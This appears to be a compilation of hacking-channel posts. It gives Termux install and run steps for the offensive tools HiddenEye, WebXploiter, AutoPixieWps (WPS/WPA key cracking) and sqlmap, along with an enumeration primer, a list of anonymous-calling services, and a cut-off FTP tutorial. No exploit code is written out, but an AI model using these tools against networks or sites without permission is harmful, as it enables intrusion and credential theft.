$ python HiddenEye.py(if not work)

$ ./HiddenEye.py


========================

Enjoy! Follow us for more...

INSTALL IN WebXploiter V0.1 TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================

========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

=========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

1. $ apt update

2. $ apt upgrade

3. $ pkg install python

4. $ git clone https://github.com/a0xnirudh/WebXploiter


Usage:

1. $ cd WebXploiter

2. $ python install.py

3. $ ./install.sh

4. $ WebXploiter.py [-h] [-u U] [-a] [-A1] [-A3]


This is a basic version of WebXploiter. As of now, it will do a basic Recon and print the results back.



========================

Enjoy! Follow us for more...

INSTALL Autopixie-WPS in TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================


========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

=========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

Autopixie-WPS = this script is meant for people


who wants to check if someone can gain the wpa key, 


and or if you are protected from this attack Any illegal 


use of this program is strictly forbidden!.


FEATURES 


Kill reaver as soon as e-hash2 is gained.


Manual input target router without scan


Wash scan > target router from scan list


Save resuslts to logfile


option to ignore router from wash scan if it has been cracked, 


or if PixieWps failed to crack the hash


remember you must have an ecternal wifi adpter 


Installation :


$ apt update && apt upgrade


$ apt install git 


$ apt install python2


$ apt install python


$ pip2 install requests


$ git clone https://github.com/nxxxu/AutoPixieWps


$ cd AutoPixieWps


$ chmod +x *


Run :


$ python2 autopixie.py


Now select any option it will guide you..

========================


Enjoy! Follow us for more...

Enumeration ?

Enumeration belongs to the first phase of Ethical Hacking, i.e., “Information Gathering”. This is a process where the attacker establishes an active connection with the victim and try to discover as much attack vectors as possible, which can be used to exploit the systems further.


Enumeration can be used to gain information on −


Network shares

SNMP data, if they are not secured properly

IP tables

Usernames of different systems

Passwords policies lists

Enumerations depend on the services that the systems offer. They can be −


DNS enumeration

NTP enumeration

SNMP enumeration

Linux/Windows enumeration

SMB enumeration

Let us now discuss some of the tools that are widely used for Enumeration.


NTP Suite

NTP Suite is used for NTP enumeration. This is important because in a network environment, you can find other primary servers that help the hosts to update their times and you can do it without authenticating the system.


Take a look at the following example.


ntpdate 192.168.1.100 01 Sept 12:50:49 ntpdate[627]: 

adjust time server 192.168.1.100 offset 0.005030 sec 


or 

ntpdc [-ilnps] [-c command] [hostname/IP_address] 

  

root@test]# ntpdc -c sysinfo 192.168.1.100 

***Warning changing to older implementation 

***Warning changing the request packet size from 160 to 48 

system peer: 192.168.1.101 


system peer mode: client

leap indicator: 00 

stratum: 5  


precision: -15 

root distance: 0.00107 s 

root dispersion: 0.02306 s 

reference ID: [192.168.1.101] 

reference time: f66s4f45.f633e130, Sept 01 2016 22:06:23.458 

system flags: monitor ntp stats calibrate 

jitter: 0.000000 s 

stability: 4.256 ppm 

broadcastdelay: 0.003875 s 

authdelay: 0.000107 s

enum4linux

enum4linux is used to enumerate Linux systems. Take a look at the following screenshot and observe how we have found the usernames present in a target host.


enum4linux


smtp-user-enum

smtp-user-enum tries to guess usernames by using SMTP service. Take a look at the following screenshot to understand how it does so.


SMTP


Quick Fix

It is recommended to disable all services that you don’t use. It reduces the possibilities of OS enumeration of the services that your systems are running.

========================

Enjoy! Follow us for more...

__________________________

INSTALL SQLMAP IN TERMUX (NO ROOT)

 ========================

WHAT I'M ABOUT TO SHARE WITH YOU IS FOR EDUCATIONAL PURPOSES ONLY!!!I WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL ACTIONS YOU'LL DO!!

========================

INSTALL IN SQLMAP TERMUX (NO ROOT)

========================

USAGE OF THIS TOOL TO ATTACK TARGETS WITHOUT PRIOR MUTUAL CONSENT IS ILLEGAL. IT'S THE END USER'S RESPONSIBILITY TO OBEY ALL APPLICABLE LOCAL, STATE AND FEDERAL LAWS. I ASSUME NO LIABILITY AND I WILL NOT BE RESPONSIBLE FOR ANY MISUSE OR HARM CAUSED BY THIS TOOL/PROGRAM.

=========================

THIS IS NEITHER MY TOOL NOR MY PROGRAM. BLACK HAT HACKING IS ILLEGAL. REMEMBER THE CONSEQUENCES AND TRY BLACK HAT HACKING AT YOUR OWN RISK.

========================

sqlmap is an open source penetration testing tool 


that automates the process of detecting and exploiting 


SQL injection flaws and taking over of database servers.


It comes with a powerful detection engine, many niche features 


for the ultimate penetration tester and a broad range of 


switches lasting from database fingerprinting, over data fetching from the database, 


to accessing the underlying file system and executing commands on 


the operating system via out-of-band connections. 


Installation :


$ apt update && apt upgrade


$ apt install git 


$ apt install python2


$ apt install python


$ git clone https://github.com/sqlmapproject/sqlmap


$ cd sqlmap


$ chmod +x *


Run :


$ python2 sqlmap.py -h


It shows all options to use this tool sqlmap


$ python2 sqlmap.py

========================



Enjoy! Follow us for more...

Calls without a SIM card

πŸ‘

Perhaps you have had situations when you had to call a person and at the same time remain completely anonymous and not burn your number.

Using a SIM card identifies you with a cell tower closest to you, I'll tell you so if you use the left SIM and call someone using unverified call services, then most likely you will not be able to remain anonymous on the network and your traffic is not encrypted and there is no point from such a SIM card, the place where you are can be tracked.

In this regard, I want to share with you services for calls. in which all traffic passes through the TOR network or simply has a high degree of encryption in the network.

List of sites:

https://tox.chat/
https://www.linphone.org/
https://jitsi.org/
https://www.ringcentral.com/
https://www.mumble.com/

Personally, I myself used the latest service for anonymous calls and I can recommend it to you, but the main thing is that the choice is yours.

I don’t see any reason to tell you about each service, because all the detailed information can be found on these sites, which I indicated above.‌‌

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...